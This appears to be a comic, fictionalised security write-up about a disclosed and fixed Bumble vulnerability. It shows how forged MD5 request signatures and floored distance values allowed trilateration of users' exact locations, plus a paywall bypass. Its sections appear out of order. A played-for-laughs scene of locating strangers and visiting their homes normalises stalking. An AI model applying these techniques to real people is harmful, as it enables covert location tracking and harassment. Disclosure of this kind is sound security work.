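for attacker in attacker_positions:
    print(coarse_distance(attacker, victim_a), coarse_distance(attacker, victim_b))
```

Because the exact co-ordinates are discarded before any distance is computed, every position inside a grid cell produces the same answers, so no sequence of spoofed locations can tell those positions apart.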

By rounding users’ locations before calculating the distance between them, Bumble would both fix this particular vulnerability and give themselves good guarantees that they won’t leak locations in the future. There would be no way that a future vulnerability could expose a user’s exact location via trilateration, since the distance calculations won’t even have access to any exact locations. If Bumble wanted to make these guarantees even stronger then they could have their app only ever record a user’s rough location in the first place. You can’t accidentally expose information that you don’t collect. However, you suspect (without proof or even probable cause) that there are commercial reasons why they would rather not do this.

Bumble awards you a $2,000 bounty. You try to keep news of this windfall from Kate, but she hears you boasting about it on the phone to your mum and demands half. In the ensuing struggle you accidentally donate it all to the Against Malaria Foundation.

You have the worst god damn friends.

Disclosure timeline

- 2021-06-15: vulnerability reported to Bumble via HackerOne

- 2021-06-18: Bumble deploy a fix

- 2021-07-21: disclosure agreed via HackerOne


A brief history lesson

However, keeping users’ exact locations private is surprisingly easy to foul up. You and Kate have already studied the history of location-revealing vulnerabilities as part of a previous blog post. In that post you tried to exploit Tinder’s user location features in order to motivate another Steve Steveington-centric scenario lazily similar to this one. Nonetheless, readers who are already familiar with that post should still stick with this one - the following recap is short and after that things get interesting indeed.

As one of the trailblazers of location-based online dating, Tinder was inevitably also one of the trailblazers of location-based security vulnerabilities. Over the years they’ve accidentally allowed an attacker to find the exact location of their users in several different ways. The first vulnerability was prosaic. Until 2014, the Tinder servers sent the Tinder app the exact co-ordinates of a potential match, then the app calculated the distance between this match and the current user. The app didn’t display the other user’s exact co-ordinates, but an attacker or interested creep could intercept their own network traffic on its way from the Tinder server to their phone and read a target’s exact co-ordinates out of it.

    {
      "user_id": 1234567890,
      "location": {
        "latitude": 37.774904,
        "longitude": -122.419422
      },
      // ...etc...
    }

To mitigate this attack, Tinder switched to calculating the distance between users on their server, rather than on users’ phones. Instead of sending a match’s exact location to a user’s phone, they sent only pre-calculated distances. This meant that the Tinder app never saw a potential match’s exact co-ordinates, and so neither did an attacker. However, even though the app only displayed distances rounded to the nearest mile (“8 miles”, “3 miles”), Tinder sent these distances to the app with 15 decimal places of precision and had the app round them before displaying them. This unnecessary precision allowed security researchers to use a technique called trilateration (which is similar to but technically not the same as triangulation) to re-derive a victim’s almost-exact location.

    {
      "user_id": 1234567890,
      "distance": 5.21398760815170,
      // ...etc...
    }

Here’s how trilateration works. Tinder knows a user’s location because their app periodically sends it to them. However, it is straightforward to spoof fake location updates that make Tinder think you’re at an arbitrary location of your choosing. The researchers spoofed location updates to Tinder, moving their attacker user around their victim’s city. From each spoofed location, they asked Tinder how far away their victim was. Seeing nothing amiss, Tinder returned the answer, to 15 decimal places of precision. The researchers repeated this process 3 times, and then drew 3 circles on a map, with centres equal to the spoofed locations and radii equal to the reported distances to the user. The point at which all 3 circles intersected gave the exact location of the victim.
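The geometry can be sketched in Python. This is a minimal illustration on a flat plane, which is a reasonable simplification at city scale, and not the researchers' actual code. The function name and the choice of plane coordinates in miles are assumptions for the example.

```python
def trilaterate(c1, r1, c2, r2, c3, r3):
    """Return the point at distance r1, r2, r3 from centres c1, c2, c3.

    Subtracting the first circle's equation from the other two cancels the
    squared unknowns and leaves two linear equations in x and y.
    """
    (x1, y1), (x2, y2), (x3, y3) = c1, c2, c3

    a1, b1 = 2 * (x2 - x1), 2 * (y2 - y1)
    k1 = r1**2 - r2**2 + x2**2 - x1**2 + y2**2 - y1**2

    a2, b2 = 2 * (x3 - x1), 2 * (y3 - y1)
    k2 = r1**2 - r3**2 + x3**2 - x1**2 + y3**2 - y1**2

    det = a1 * b2 - a2 * b1
    if abs(det) < 1e-12:
        raise ValueError("centres are collinear, so the point is ambiguous")

    # Cramer's rule for the 2x2 linear system.
    x = (k1 * b2 - k2 * b1) / det
    y = (a1 * k2 - a2 * k1) / det
    return x, y
```

With exact distances the three circles meet at a single point. With distances rounded to the nearest mile the same arithmetic still runs, but the answer is only a rough estimate.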

Tinder fixed this vulnerability by both calculating and rounding the distances between users on their servers, and only ever sending their app these fully-rounded values. You’ve read that Bumble also only send fully-rounded values, perhaps having learned from Tinder’s mistakes. Rounded distances can still be used to do approximate trilateration, but only to within a mile-by-mile square or so. This isn’t good enough for you, since it won’t tell you whether the Stevester is at FBI HQ or the McDonald’s half a mile away. In order to locate Steve with the precision you need, you’re going to need to find a new vulnerability.

You’re going to need help.

Forming a hypothesis

You can always rely on your other good buddy, Kate Kateberry, to get you out of a jam. You still haven’t paid her for all the systems design advice that she gave you last year, but fortunately she has enemies of her own that she needs to keep tabs on, and she too could make good use of a vulnerability in Bumble that revealed a user’s exact location. After a brief phone call she hurries over to your offices in the San Francisco Public Library to start looking for one.

When she arrives she hums and haws and has an idea.

“Our problem”, she says, “is that Bumble rounds the distance between two users, and sends only this approximate distance to the Bumble app. As you know, this means that we can’t do trilateration with any useful precision. However, within the details of how Bumble calculate these approximate distances lie opportunities for them to make mistakes that we might be able to exploit.

“One sensible-seeming approach would be for Bumble to calculate the exact distance between two users and then round this distance to the nearest mile. The code to do this might look something like this:

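    import math

    def calculate_approximate_distance(user1_location, user2_location):
        # Calculate the exact distance in miles. calculate_exact_distance is
        # assumed to be defined elsewhere (e.g. a great-circle formula).
        exact_distance = calculate_exact_distance(
            user1_location,
            user2_location,
        )
        # Round it to the nearest mile, with halves rounding up.
        # (Python's built-in round() rounds halves to the nearest even number.)
        rounded_distance = math.floor(exact_distance + 0.5)
        # Return the rounded distance
        return rounded_distance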

“Sensible-seeming, but also dangerously insecure. If an attacker (i.e. us) can find the point at which the reported distance to a user flips from, say, 3 miles to 4 miles, the attacker can infer that this is the point at which their victim is exactly 3.5 miles away from them. 3.49999 miles rounds down to 3 miles, 3.50000 rounds up to 4. The attacker can find these flipping points by spoofing a location request that puts them in roughly the vicinity of their victim, then slowly shuffling their position in a constant direction, at each point asking Bumble how far away their victim is. When the reported distance changes from (say) 3 to 4 miles, they’ve found a flipping point. If the attacker can find 3 different flipping points then they’ve once again got 3 exact distances to their victim and can perform precise trilateration, exactly as the researchers attacking Tinder did.”
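Kate's reasoning can be checked with a toy simulation. The sketch below is not an attack on any real service: it models the attacker and victim as positions along a straight line measured in miles, and `reported_distance` stands in for the hypothesised server-side rounding. All names are made up for the example.

```python
import math


def reported_distance(exact_miles):
    """Round to the nearest mile, halves rounding up, as the hypothesis assumes."""
    return math.floor(exact_miles + 0.5)


def find_flip(start, step, victim_position, max_steps=100_000):
    """Shuffle along the line in a constant direction until the reported distance changes.

    Returns (position at which the new value was first seen, old value, new value).
    """
    position = start
    previous = reported_distance(abs(position - victim_position))
    for _ in range(max_steps):
        position += step
        current = reported_distance(abs(position - victim_position))
        if current != previous:
            return position, previous, current
    raise RuntimeError("no flip found within max_steps")
```

Starting 3 miles from the victim and shuffling away in steps of 0.001 miles, the reported value changes from 3 to 4 at roughly 3.5 miles. The rounded answers have leaked an almost-exact distance.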

How do we know if this is what Bumble does? you ask. “We try out an attack and see if it works”, replies Kate.

This means that you and Kate are going to need to write an automated script that sends a carefully crafted sequence of requests to the Bumble servers, leaping your user around the city and repeatedly asking for the distance to your victim. To do this you’ll need to work out:

- How the Bumble app communicates with the server

- How the Bumble API works

- How to send API requests that change your location

- How to send API requests that tell you how far away another user is

You decide to use the Bumble website on your laptop rather than the Bumble smartphone app. You find it easier to inspect traffic coming from a website than from an app, and you can use a desktop browser’s developer tools to read the JavaScript code that powers a site.

Creating accounts

You’ll need two Bumble profiles: one to be the attacker and one to be the victim. You’ll place the victim’s account in a known location, and use the attacker’s account to re-locate them. Once you’ve perfected the attack in the lab you’ll trick Steve into matching with one of your accounts and launch the attack against him.

You sign up for your first Bumble account. It asks you for a profile picture. To preserve your privacy you upload a picture of the ceiling. Bumble rejects it for “not passing our photo guidelines.” They must be performing facial recognition. You upload a stock photo of a man in a nice shirt pointing at a whiteboard.

Bumble rejects it again. Maybe they’re comparing the photo against a database of stock photos. You crop the photo and scribble on the background with a paintbrush tool. Bumble accepts the photo! However, next they ask you to submit a selfie of yourself putting your right hand on your head, to prove that your picture really is of you. You don’t know how to contact the man in the stock photo and you’re not sure that he would send you a selfie. You do your best, but Bumble rejects your effort. There’s no option to change your initially submitted profile photo until you’ve passed this verification so you abandon this account and start again.

You don’t want to compromise your privacy by submitting real photos of yourself, so you take a profile picture of Jenna the intern and then another picture of her with her right hand on her head. She is confused but she knows who pays her salary, or at least who might one day pay her salary if the next six months go well and a suitable full-time position is available. You take the same set of photos of Wilson in…marketing? Finance? Who cares. You successfully create two accounts, and now you’re ready to start swiping.

Even though you probably don’t need to, you want to have your accounts match with each other in order to give them the highest possible access to each other’s information. You restrict Jenna and Wilson’s match filter to “within 1 mile” and start swiping. Before too long your Jenna account is shown your Wilson account, so you swipe right to indicate her interest. However, your Wilson account keeps swiping left without ever seeing Jenna, until eventually he is told that he has seen all the potential matches in his area. Strange. You see a notification telling Wilson that someone has already “liked” him. Sounds promising. You click on it. Bumble demands $1.99 in order to show you your not-so-mysterious admirer.

You preferred it when these dating apps were in their hyper-growth phase and your trysts were paid for by venture capitalists. You reluctantly reach for the company credit card but Kate knocks it out of your hand. “We don’t need to pay for this. I bet we can bypass this paywall. Let’s pause our efforts to get Jenna and Wilson to match and start investigating how the app works.” Never one to pass up the opportunity to stiff a few bucks, you happily agree.

Automating requests to the Bumble API

In order to figure out how the app works, you need to work out how to send API requests to the Bumble servers. Their API isn’t publicly documented because it isn’t intended to be used for automation and Bumble doesn’t want people like you doing things like what you’re doing. “We’ll use a tool called Burp Suite,” Kate says. “It’s an HTTP proxy, which means we can use it to intercept and inspect HTTP requests going from the Bumble website to the Bumble servers. By studying these requests and responses we can work out how to replay and edit them. This will allow us to make our own, customized HTTP requests from a script, without needing to go through the Bumble app or website.”

Kate sets up Burp Suite, and shows you the HTTP requests that your laptop is sending to the Bumble servers. She swipes yes on a rando. “See, this is the HTTP request that Bumble sends when you swipe yes on someone:

    POST /mwebapi.phtml?SERVER_ENCOUNTERS_VOTE HTTP/1.1
    Host: eu1.bumble.com
    Cookie: CENSORED
    X-Pingback: 81df75f32cf12a5272b798ed01345c1c
    [[...further headers deleted for brevity...]]
    Sec-Gpc: 1
    Connection: close

    {
      "$gpb": "badoo.bma.BadooMessage",
      "body": [
        {
          "message_type": 80,
          "server_encounters_vote": {
            "person_id": "CENSORED",
            "vote": 3,
            "vote_source": 1,
            "game_mode": 0
          }
        }
      ],
      "message_id": 71,
      "message_type": 80,
      "version": 1,
      "is_background": false
    }

“There’s the user ID of the swipee, in the person_id field inside the body field. If we can figure out the user ID of Jenna’s account, we can insert it into this ‘swipe yes’ request from our Wilson account. If Bumble doesn’t check that the user you swiped is currently in your feed then they’ll probably accept the swipe and match Wilson with Jenna.” How can we work out Jenna’s user ID? you ask.

“I’m sure we could find it by inspecting HTTP requests sent by our Jenna account” says Kate, “but I have a more interesting idea.” Kate finds the HTTP request and response that loads Wilson’s list of pre-yessed accounts (which Bumble calls his “Beeline”).

“Look, this request returns a list of blurred images to display on the Beeline page. But alongside each image it also shows the user ID that the image belongs to! That first picture is of Jenna, so the user ID alongside it must be Jenna’s.”

    {
      // ...
      "users": [
        {
          "$gpb": "badoo.bma.User",
          // Jenna's user ID
          "user_id": "CENSORED",
          "projection": [340, 871],
          "access_level": 30,
          "profile_photo": {
            "$gpb": "badoo.bma.Photo",
            "id": "CENSORED",
            "preview_url": "//pd2eu.bumbcdn.com/p33/hidden?euri=CENSORED",
            "large_url": "//pd2eu.bumbcdn.com/p33/hidden?euri=CENSORED",
            // ...
          }
        },
        // ...
      ]
    }

Wouldn’t knowing the user IDs of the people in their Beeline allow anyone to spoof swipe-yes requests on all the people who have swiped yes on them, without paying Bumble $1.99? you ask. “Yes,” says Kate, “assuming that Bumble doesn’t validate that the user who you’re trying to match with is in your match queue, which in my experience dating apps tend not to. So I suppose we’ve probably found our first real, if unexciting, vulnerability. (EDITOR’S NOTE: this ancillary vulnerability was fixed shortly after the publication of this post.)

“Anyway, let’s insert Jenna’s ID into a swipe-yes request and see what happens.”

What happens is that Bumble returns a “Server Error”.

Forging signatures

“That’s strange,” says Kate. “I wonder what it didn’t like about our edited request.” After some experimentation, Kate realises that if you edit anything about the HTTP body of a request, even just adding an innocuous extra space at the end of it, then the edited request will fail. “That suggests to me that the request contains something called a signature,” says Kate. You ask what that means.

“A signature is a string of random-looking characters generated from a piece of data, and it’s used to detect when that piece of data has been altered. There are many different ways of generating signatures, but for a given signing process, the same input will always produce the same signature.

“In order to use a signature to verify that a piece of text hasn’t been tampered with, a verifier can re-generate the text’s signature themselves. If their signature matches the one that came with the text, then the text hasn’t been tampered with since the signature was generated. If it doesn’t match then it has. If the HTTP requests that we’re sending to Bumble contain a signature somewhere then this would explain why we’re seeing an error message. We’re changing the HTTP request body, but we’re not updating its signature.

“Before sending an HTTP request, the JavaScript running on the Bumble website must generate a signature from the request’s body and attach it to the request somehow. When the Bumble server receives the request, it checks the signature. It accepts the request if the signature is valid and rejects it if it isn’t. This makes it very, very slightly harder for sneakertons like us to mess with their system.

“However”, continues Kate, “even without knowing anything about how these signatures are produced, I can say for certain that they don’t provide any actual security. The problem is that the signatures are generated by JavaScript running on the Bumble website, which executes on our computer. This means that we have access to the JavaScript code that generates the signatures, including any secret keys that may be used. We can therefore read the code, work out what it’s doing, and replicate the logic in order to generate our own signatures for our own edited requests. The Bumble servers will have no idea that these forged signatures were generated by us, rather than the Bumble website.

“Let’s try and find the signatures in these requests. We’re looking for a random-looking string, maybe 30 characters or so long. It could technically be anywhere in the request - path, headers, body - but I would guess that it’s in a header.” How about this? you say, pointing to an HTTP header called X-Pingback with a value of 81df75f32cf12a5272b798ed01345c1c.

    POST /mwebapi.phtml?SERVER_ENCOUNTERS_VOTE HTTP/1.1
    ...
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0
    X-Pingback: 81df75f32cf12a5272b798ed01345c1c
    Content-Type: application/json
    ...

“Perfect,” says Kate, “that’s an odd name for the header, but the value sure looks like a signature.” This sounds like progress, you say. But how can we find out how to generate our own signatures for our edited requests?

“We can start with a few educated guesses,” says Kate. “I suspect that the programmers who built Bumble know that these signatures don’t actually secure anything. I suspect that they only use them in order to dissuade unmotivated tinkerers and create a small speedbump for motivated ones like us. They might therefore just be using a simple hash function, like MD5 or SHA256. No one would ever use a plain old hash function to generate real, secure signatures, but it would be perfectly reasonable to use them to generate small inconveniences.” Kate copies the HTTP body of a request into a file and runs it through a few such simple functions. None of them match the signature in the request. “No problem,” says Kate, “we’ll just have to read the JavaScript.”
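Kate's quick experiment might look something like this in Python. It is a sketch only: the helper name and the particular list of hash functions tried are assumptions, and `hashlib` is Python's standard hashing module. One helpful clue is that the observed X-Pingback value is 32 hexadecimal characters long, which is the length of an MD5 digest.

```python
import hashlib


def matching_hashes(body: bytes, observed_signature: str):
    """Return the names of simple hash functions whose digest of `body`
    equals the signature seen in the request header."""
    candidates = ("md5", "sha1", "sha256")  # hypothetical shortlist
    matches = []
    for name in candidates:
        digest = hashlib.new(name, body).hexdigest()
        if digest == observed_signature.lower():
            matches.append(name)
    return matches
```

An empty list, which is what Kate gets, means that the signature is not simply a plain hash of the body on its own.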

Reading the JavaScript

Is this reverse-engineering? you ask. “It’s not as fancy as that,” says Kate. “‘Reverse-engineering’ implies that we’re probing the system from afar, and using the inputs and outputs that we observe to infer what’s going on inside it. But here all we have to do is read the code.” Can I still write reverse-engineering on my CV? you ask. But Kate is busy.

Kate is right that all you have to do is read the code, but reading code isn’t always easy. As is standard practice, Bumble have squashed all their JavaScript into one highly-condensed or minified file. They’ve primarily done this in order to reduce the amount of data that they have to send to users of their website, but minification also has the side-effect of making it trickier for an interested observer to understand the code. The minifier has removed all comments; changed all variables from descriptive names like signBody to inscrutable single-character names like f and R; and concatenated the code onto 39 lines, each thousands of characters long.

You suggest giving up and just asking Steve as a friend if he’s an FBI informant. Kate firmly and impolitely forbids this. “We don’t need to fully understand the code in order to work out what it’s doing.” She downloads Bumble’s single, giant JavaScript file onto her computer. She runs it through an un-minifying tool to make it easier to read. This can’t bring back the original variable names or comments, but it does reformat the code sensibly onto multiple lines which is still a big help. The expanded version weighs in at a little over 51,000 lines of code.

Next she searches for the string X-Pingback. Since this is a string, not a variable name, it shouldn’t have been affected by the minification and un-minification process. She finds the string on line 36,875 and starts tracing function calls to see how the corresponding header value is generated.

You start to believe that this might work. A few minutes later she announces two discoveries.

“First”, she says, “I’ve found the function that generates the signature, on line 36,657.”

Oh excellent, you say, so we just have to re-write that function in our Python script and we’re good? “We could,” says Kate, “but that sounds difficult. I have an easier idea.” The function she has found contains lots of long, random-seeming, hard-coded numbers. She pastes 1732584193, the first of these numbers, into Google. It returns pages of results for implementations of a widely-used hash function called MD5. “This function is just MD5 written out in JavaScript,” she says, “so we can use Python’s built-in MD5 implementation from the hashlib module.”

But we already tried MD5 and it didn’t work, you protest. “True,” says Kate, “which brings me to my second discovery. Before passing a request body into MD5 and signing it, Bumble prefixes the body with a long string (exact value redacted), and then signs the combination of this key and the body.

    const not_actually_secret_key = "REDACTED"
    // Exact combination method redacted
    const signature = md5(combine_somehow(not_actually_secret_key, http_body))

“This is somewhat similar to how real-world cryptographic signing algorithms like HMAC (Hash-based Message Authentication Code) work. When generating an HMAC, you combine the text that you want to sign with a secret key, then pass it through a deterministic function like MD5. A verifier who knows the secret key can repeat this process to verify that the signature is valid, but an attacker can’t generate new signatures because they don’t know the secret key. However, this doesn’t work for Bumble because their secret key necessarily has to be hard-coded in their JavaScript, which means that we know what it is. This means that we can generate valid new signatures for our own edited requests by adding the key to our request bodies and passing the result through MD5.”
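For comparison, here is roughly what a real HMAC looks like using Python's standard `hmac` module. This sketch uses SHA-256 as the underlying hash rather than MD5, and the function names are made up for the example. The important property is that the key lives only on machines that the attacker cannot read.

```python
import hashlib
import hmac


def sign(secret_key: bytes, message: bytes) -> str:
    """Generate an HMAC-SHA256 signature for `message`."""
    return hmac.new(secret_key, message, hashlib.sha256).hexdigest()


def verify(secret_key: bytes, message: bytes, signature: str) -> bool:
    """Re-generate the signature and compare it in constant time."""
    expected = sign(secret_key, message)
    return hmac.compare_digest(expected, signature)
```

A verifier holding the key accepts an untouched message and rejects one that has been edited, even by a single trailing space. Someone without the key cannot produce a signature that verifies.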

Kate writes a script that builds and sends HTTP requests to the Bumble API. It signs these requests in the X-Pingback header using the key REDACTED and the MD5 algorithm. In order to allow her script to act as your Wilson user, Kate copies the Wilson user’s cookies from her browser into her script and adds them into her requests. Now she is able to send a signed, authenticated, customized ‘match’ request to Bumble that matches Wilson with Jenna. Bumble accepts and processes the request, and congratulates her on her new match. You do not have to give Bumble $1.99.
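The signing step of such a script might be sketched as follows. Several things here are assumptions made for illustration. The key is left as the placeholder REDACTED, and the post redacts the exact way the key and body are combined, so plain prefixing is a guess. The `https` scheme and the function names are also assumptions. The sketch only builds the request pieces and does not send anything.

```python
import hashlib
import json

NOT_ACTUALLY_SECRET_KEY = "REDACTED"  # placeholder, not the real value
API_URL = "https://eu1.bumble.com/mwebapi.phtml?SERVER_ENCOUNTERS_VOTE"  # scheme assumed


def sign_body(body: str, key: str = NOT_ACTUALLY_SECRET_KEY) -> str:
    # ASSUMPTION: the key is simply prefixed to the body before hashing.
    return hashlib.md5((key + body).encode("utf-8")).hexdigest()


def build_vote_request(person_id: str, cookie: str):
    """Build (url, headers, body) for a swipe-yes request, signed over the edited body."""
    body = json.dumps({
        "$gpb": "badoo.bma.BadooMessage",
        "body": [{
            "message_type": 80,
            "server_encounters_vote": {
                "person_id": person_id,
                "vote": 3,
                "vote_source": 1,
                "game_mode": 0,
            },
        }],
        "message_id": 71,
        "message_type": 80,
        "version": 1,
        "is_background": False,
    })
    headers = {
        "Cookie": cookie,
        "Content-Type": "application/json",
        "X-Pingback": sign_body(body),  # signature must match the exact bytes sent
    }
    return API_URL, headers, body
```

The signature is computed over the exact body string that will be sent, so any later edit to the body, even an extra space, needs a fresh signature.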

Any questions so far? asks Kate. You don’t want to sound stupid so you say no.

Testing the attack

Now that you know how to send arbitrary requests to the Bumble API from a script you can start testing out a trilateration attack. Kate spoofs an API request to put Wilson in the middle of the Golden Gate Bridge. It’s Jenna’s task to re-locate him.

Remember, Bumble only show you the approximate distance between you and other users. However, your hypothesis is that they calculate each approximate distance by calculating the exact distance and then rounding it. If you can find the point at which a distance to a victim flips from (say) 3 miles to 4, you can infer that this is the point at which the victim is exactly 3.5 miles away. If you can find 3 such flipping points then you can use trilateration to precisely locate the victim.

Kate starts by putting Jenna in a random location in San Francisco. She then shuffles her south, 0.01 of a degree of latitude each time. With each shuffle she asks Bumble how far away Wilson is. When this flips from 4 to 5 miles, Kate backs Jenna up one step and shuffles south in smaller increments of 0.001 degrees until the distance flips from 4 to 5 again. This backtracking improves the precision of the measured point at which the distance flips.

After some trial and error, Kate realizes that Bumble doesn’t round its distances like most people were taught at school. When most people think of “rounding”, they think of a process where the cutoff is .5. 3.4999 rounds down to 3; 3.5000 rounds up to 4. However, Bumble floors distances, which means that everything is always rounded down. 3.0001, 3.4999, and 3.9999 all round down to 3; 4.0001 rounds down to 4. This discovery doesn’t break the attack - it just means you have to edit your script to note that the point at which the distance flips from 3 miles to 4 miles is the point at which the victim is exactly 4.0 miles away, not 3.5 miles.
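The coarse-then-fine search, adjusted for flooring, can be sketched against a simulated server. Nothing here talks to Bumble: `make_floor_oracle` is a stand-in that floors a haversine distance, and all function names are hypothetical. The step sizes of 0.01 and 0.001 degrees are the ones described above.

```python
import math

EARTH_RADIUS_MILES = 3958.8  # mean Earth radius, an approximation


def haversine_miles(lat1, lon1, lat2, lon2):
    """Great-circle distance in miles between two points given in degrees."""
    phi1, phi2 = math.radians(lat1), math.radians(lat2)
    dphi = phi2 - phi1
    dlam = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(phi1) * math.cos(phi2) * math.sin(dlam / 2) ** 2
    return 2 * EARTH_RADIUS_MILES * math.asin(math.sqrt(a))


def make_floor_oracle(victim_lat, victim_lon):
    """Simulated server: reports the distance to the victim, always rounded down."""
    def oracle(lat, lon):
        return math.floor(haversine_miles(lat, lon, victim_lat, victim_lon))
    return oracle


def walk_south_until_flip(oracle, lat, lon, step, max_steps=10_000):
    """Step south until the reported distance changes.

    Returns (latitude before flip, latitude after flip, old value, new value).
    """
    previous = oracle(lat, lon)
    for _ in range(max_steps):
        next_lat = lat - step
        current = oracle(next_lat, lon)
        if current != previous:
            return lat, next_lat, previous, current
        lat = next_lat
    raise RuntimeError("no flip found within max_steps")


def find_flipping_point(oracle, start_lat, lon, coarse_step=0.01, fine_step=0.001):
    """Coarse pass to bracket the flip, then a fine pass from just before it."""
    before, _, _, _ = walk_south_until_flip(oracle, start_lat, lon, coarse_step)
    _, after, previous, current = walk_south_until_flip(oracle, before, lon, fine_step)
    # With flooring, the exact distance at the flip is the higher of the two values.
    return after, max(previous, current)
```

The returned radius is a whole number of miles, and the true distance at the returned latitude exceeds it by less than one fine step, which is about 0.07 miles for 0.001 degrees of latitude.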

Kate writes a Python script to repeat this process 3 times, starting at 3 arbitrary locations. Once it has found 3 flipping points, her script draws 3 circles, each centred on a flipping point and with a radius equal to the higher of the two distances either side of the flip. The script takes a long time to develop because if you make too many requests or move yourself too far too often then Bumble rate-limits your requests and stops accepting position updates for a while. A stray minus sign temporarily puts Jenna in the middle of the Chinese province of Shandong, but after a brief timeout Bumble allows her to come back.

When the script eventually runs to completion you are both very pleased with what you see.

Executing the attack

You and Kate have a fun night together catfishing local strangers. You set Wilson and Jenna’s profiles to be interested in matches within 1 mile of your current location, and then spend a wholesome evening matching with people, trilaterating them to find out where they live, and knocking on their door while sending them weird Bumble messages. Sometimes you get the wrong house and the prank (or is it by this point a crime?) doesn’t land, but you still have a good time.

The next day you’re ready to execute your attack on the Stevedog himself. In order to target him you’ll need to find out his user ID, and the easiest way to do this is to match with him. Kate wonders if you need to make a new Bumble profile, since Steve will surely recognize Wilson and Jenna. You tell her that Steve turbo-swipes “Yes” on every person who appears in his feed in order to maximize his reach, which you think worked on 2012 Tinder but by now probably just makes Bumble’s algorithms think he’s desperate. He’s also a self-absorbed narcissist who doesn’t pay any attention to anyone other than himself, so the chances of him recognizing anyone are very low.

You have Jenna’s account swipe yes on Steve and then wait anxiously for a ping. It comes within the hour, during one of Steve’s trademark long toilet breaks. It’s a match.

You pretend to get on a call with a potential CFO. Steve slips out of the building. You call Kate over and you execute the trilateration attack on Steve. You can’t believe what your script spits out.

Three red circles that meet at the J Edgar Hoover Building, San Francisco. FBI Headquarters.

Revenge and reconciliation

You grab a copy of Anna Karenina by Tolstoy and pledge to kill Steve. When he returns you drag him into a conference room and start swinging. It’s not what you think, he protests. I’ve been trying to get the company back into the black by playing in the FBI poker game. Unfortunately it has not been going well, my goodness me. I might need to turn state’s evidence to get out of this new jam.

You brandish your 864 page 19th century classic.

Or I suppose we could do some A/B testing and try to improve our sales funnel conversion, he suggests.

You agree that that would be a good idea. Don’t do it for yourself, you say, do it for our team of 190 assorted interns, volunteers, and unpaid trial workers who all rely on this job, if not for income, then for valuable work experience that might one day help them break into the industry.

You put an arm around him and give him what you hope is a friendly yet highly menacing squeeze. Come on friend, you say, let’s get back to work.
